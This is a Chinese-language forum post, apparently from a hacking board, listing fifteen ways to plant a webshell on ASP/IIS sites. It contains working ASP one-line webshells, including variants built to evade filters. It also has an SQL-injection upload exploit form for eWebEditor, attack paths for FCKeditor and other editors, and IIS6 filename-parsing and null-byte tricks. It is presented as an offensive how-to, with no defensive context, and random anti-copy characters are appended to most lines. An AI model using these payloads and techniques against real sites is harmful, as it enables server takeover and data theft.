|
 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式/ ]# p9 V L; G8 f: Q3 U/ x
' _# b: y3 u& C4 P- }# ?: R# N6 _0 b
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp) e. |3 N! A' k* q
+ o- r, |; `. z4 D9 P f, |& A
3.上传漏洞:( ~: T8 l' D- l: D: j8 p1 U4 n
4 z1 O( W1 A. J, s+ m6 l动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00; S+ t) U, u! D; u' d1 c7 x
8 q0 e6 q! n) O) n/ b1 K2 z; b# @
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件( R( ~& p5 F0 m
0 A' Z' b$ Y3 C! }& e+ `; Y
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
6 M6 t! f" p4 c* H3 [$ S2 \然后在上传文件里面填要传的图片格式的ASP木马- Q: c3 ?+ @) w' m% R9 u
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp: s0 u8 m) f' ]- Z' F3 Y
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传, X5 m; G4 c6 ~( o: ]/ V+ V
9 J( }$ G5 X* c' b! j% ]; Y, R" _<html>
4 D; u9 \6 Y# o<head>
4 u4 u# ~. N& Z0 w! R2 _" V% I<title>ewebeditor upload.asp上传利用</title>2 \ y8 T% O% f1 H' z |! q
</head>
" @% o3 r8 {6 v/ y, q* z. r. |<body>" _$ Z1 H8 p* @2 t
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
4 E$ z8 O- [ c8 _<input type=file name=uploadfile size=100><br><br>/ g- ^ k4 @8 h4 l4 \
<input type=submit value=Fuck>
# v! V m* H) W1 ]9 g& B</form># }7 l- Q/ S7 U1 k
</body>
5 g( V1 w: F0 q7 f! I T</form>
/ [4 c2 R4 w+ A: [. G</html>6 T+ D+ N3 `2 X/ G
. K4 E3 V" z) s; D2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
+ v5 O7 W v& Y) W3 k" i+ | V5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp7 X# N! O6 l& o
+ w7 W8 k* f- T" g! H! h利用windows2003解析。建立zjq.asp的文件夹
6 R* Y+ i- ?7 f+ l6 u- s( o: F2 t8 Y* }/ U- Y; u/ W
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型% G/ |+ P- ~" O/ A; r
' U0 Q4 N6 \9 o7 Q7.cuteeditor:类似ewebeditor
: o$ q+ C8 t2 I4 ?3 i: d. [4 A" d$ w$ Z, E; |# g
8.htmleditor:同上, }$ _* @* A& o9 c7 U$ B
( G' H6 } U2 ?+ a9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
5 v- p: s1 x: S9 W7 D/ p7 e: G/ q" v6 G
<%execute request("value")%><%'<% loop <%:%>
, r, C# X) f" i; B/ g$ F8 O! k% d+ {% D2 \" |7 q3 R
<%'<% loop <%:%><%execute request("value")%>* {% P# y) e6 Q2 N' L
x. k! U6 Q$ y% ^2 _0 M' Q/ @<%execute request("value")'<% loop <%:%>7 |1 Q, r! d* e' m1 s1 @& Z% G l( g
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
! E0 j; ~- v# c. N' g+ K1 k: K- t' ]. w1 X. q7 d
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞0 j9 h5 L' a; e; ?
0 I. B: H2 K$ m+ [) o
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3+ I4 b, |& [/ y5 R& w
: `# p5 C8 U8 _7 g" b3 H: ]# l+ r
解析漏洞得到webshell7 q$ O$ v3 H, x8 M6 j3 O
Q/ `; n$ @! i _1 w12.mssql差异备份,日志备份,前提需知道web路径
( y/ o1 u4 ]" j7 @$ f$ d. r* O# s& Q6 G. ~; o( L3 P. v* v
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell! p7 n7 G! W8 }6 Y5 p1 V
1 I- {$ P* U5 L3 K& {! |
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell$ p' D, @% C2 Y' E8 v& y( Y, a
+ w% I0 T# X( O6 x7 o
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可8 |+ }, I* n5 I! ~' @' `( n. ]
' g) ?9 C; K' {8 y
以上只是本人的一些拙见,并不完善,以后想到了再继续添加0 Y) b$ w. Q1 s: m# u" }, O
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|